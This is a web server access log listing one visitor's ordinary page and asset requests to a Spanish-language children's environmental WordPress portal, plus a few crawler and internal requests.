5.139.66.62 - - [19/Feb/2024:01:56:41 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/ui/jquery.ui.all.css?ver=20.9.6 HTTP/1.1" 200 18765
5.139.66.62 - - [19/Feb/2024:01:56:42 -0500] "GET /portaldeninos/wp-content/plugins/google-analytics-for-wordpress/assets/js/frontend-gtag.min.js?ver=8.5.0 HTTP/1.1" 200 11801
5.139.66.62 - - [19/Feb/2024:01:56:40 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/layout.css?ver=20.9.6 HTTP/1.1" 200 116639
5.139.66.62 - - [19/Feb/2024:01:56:41 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/css/jplayer.blue.monday.css?ver=20.9.6 HTTP/1.1" 200 9834
5.139.66.62 - - [19/Feb/2024:01:56:42 -0500] "GET /portaldeninos/wp-content/themes/betheme/css/responsive.css?ver=20.9.6 HTTP/1.1" 200 55740
5.139.66.62 - - [19/Feb/2024:01:56:42 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/modernizr.custom.js?ver=4.9.8 HTTP/1.1" 200 9019
5.139.66.62 - - [19/Feb/2024:01:56:42 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/css/site.min.css?ver=1.8.14 HTTP/1.1" 200 8260
5.139.66.62 - - [19/Feb/2024:01:56:43 -0500] "GET /portaldeninos/wp-content/uploads/2019/08/Logo-Ambientic.png HTTP/1.1" 200 22941
5.139.66.62 - - [19/Feb/2024:01:56:42 -0500] "GET /portaldeninos/wp-content/plugins/gallery-videos/JS/Total-Soft-Gallery-Video-Widget.js?ver=4.9.8 HTTP/1.1" 200 80264
5.139.66.62 - - [19/Feb/2024:01:56:42 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4 HTTP/1.1" 200 4000
5.139.66.62 - - [19/Feb/2024:01:56:42 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
5.139.66.62 - - [19/Feb/2024:01:56:43 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4 HTTP/1.1" 200 6908
5.139.66.62 - - [19/Feb/2024:01:56:43 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-cabezote-ni%C3%B1os.png HTTP/1.1" 200 64425
5.139.66.62 - - [19/Feb/2024:01:56:44 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4 HTTP/1.1" 200 3148
5.139.66.62 - - [19/Feb/2024:01:56:42 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery.js?ver=1.12.4 HTTP/1.1" 200 97184
5.139.66.62 - - [19/Feb/2024:01:56:44 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/tabs.min.js?ver=1.11.4 HTTP/1.1" 200 12110
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
5.139.66.62 - - [19/Feb/2024:01:56:44 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4 HTTP/1.1" 200 6527
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-miambiente-ni%C3%B1os.png HTTP/1.1" 200 11944
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/fonts/mfn-icons.woff?93978679 HTTP/1.1" 200 80932
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/plugins.js?ver=20.9.6 HTTP/1.1" 200 197151
5.139.66.62 - - [19/Feb/2024:01:56:45 -0500] "GET /portaldeninos/wp-content/plugins/popup-maker/assets/js/site.min.js?defer&ver=1.8.14 HTTP/1.1" 200 48457
5.139.66.62 - - [19/Feb/2024:01:56:46 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-videos-ni%C3%B1os.png HTTP/1.1" 200 10502
5.139.66.62 - - [19/Feb/2024:01:56:47 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-humedales-ni%C3%B1os.png HTTP/1.1" 200 13361
5.139.66.62 - - [19/Feb/2024:01:56:46 -0500] "GET /portaldeninos/wp-content/uploads/2018/10/oso.jpg HTTP/1.1" 200 305180
5.139.66.62 - - [19/Feb/2024:01:56:46 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Tierra-escenario.jpg HTTP/1.1" 200 181491
5.139.66.62 - - [19/Feb/2024:01:56:47 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/fb.jpg HTTP/1.1" 200 9893
5.139.66.62 - - [19/Feb/2024:01:56:46 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/caneca.jpg HTTP/1.1" 200 262661
5.139.66.62 - - [19/Feb/2024:01:56:48 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/ig.jpg HTTP/1.1" 200 11470
5.139.66.62 - - [19/Feb/2024:01:56:46 -0500] "GET /portaldeninos/wp-content/uploads/2018/11/tigrillo.jpg HTTP/1.1" 200 402961
5.139.66.62 - - [19/Feb/2024:01:56:48 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/yt.jpg HTTP/1.1" 200 10577
5.139.66.62 - - [19/Feb/2024:01:56:48 -0500] "GET /portaldeninos/wp-content/uploads/2020/06/tw.jpg HTTP/1.1" 200 11056
5.139.66.62 - - [19/Feb/2024:01:56:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/box_shadow.png HTTP/1.1" 200 108
5.139.66.62 - - [19/Feb/2024:01:56:48 -0500] "GET /portaldeninos/wp-content/themes/betheme/images/stripes/stripes_3_b.png HTTP/1.1" 200 974
5.139.66.62 - - [19/Feb/2024:01:56:50 -0500] "GET /portaldeninos/wp-json/pum/v1/analytics/?event=open&pid=1126&_cache=1708325894762 HTTP/1.1" 204 -
5.139.66.62 - - [19/Feb/2024:01:56:46 -0500] "GET /portaldeninos/wp-content/uploads/2020/01/Frailejon-escenario.jpg HTTP/1.1" 200 357472
5.139.66.62 - - [19/Feb/2024:01:56:48 -0500] "GET /portaldeninos/wp-content/uploads/2023/08/Infografia-Web-Infantil.mp4 HTTP/1.1" 206 162022
5.139.66.62 - - [19/Feb/2024:01:56:47 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/Infograf%C3%ADa-humedales-actualizada.png HTTP/1.1" 200 588022
5.139.66.62 - - [19/Feb/2024:01:56:52 -0500] "GET /portaldeninos/wp-content/uploads/2023/08/Infografia-Web-Infantil.mp4 HTTP/1.1" 206 235744
5.139.66.62 - - [19/Feb/2024:01:56:48 -0500] "GET /portaldeninos/wp-content/uploads/2019/06/CabezoteAMBIENTIC.mp4 HTTP/1.1" 206 235750
5.139.66.62 - - [19/Feb/2024:01:56:47 -0500] "GET /portaldeninos/wp-content/uploads/2022/08/HUmedalConejera03-1.jpg HTTP/1.1" 200 440580
95.108.213.204 - - [19/Feb/2024:01:57:04 -0500] "GET /robots.txt HTTP/1.1" 404 1035
95.108.213.105 - - [19/Feb/2024:01:57:05 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
216.244.66.195 - - [19/Feb/2024:01:57:24 -0500] "GET /galeria/galeria/fotos/boa10G.jpg HTTP/1.1" 200 163260
172.22.2.4 - - [19/Feb/2024:01:55:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:01:56:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
172.22.2.4 - - [19/Feb/2024:01:58:38 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [19/Feb/2024:01:59:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
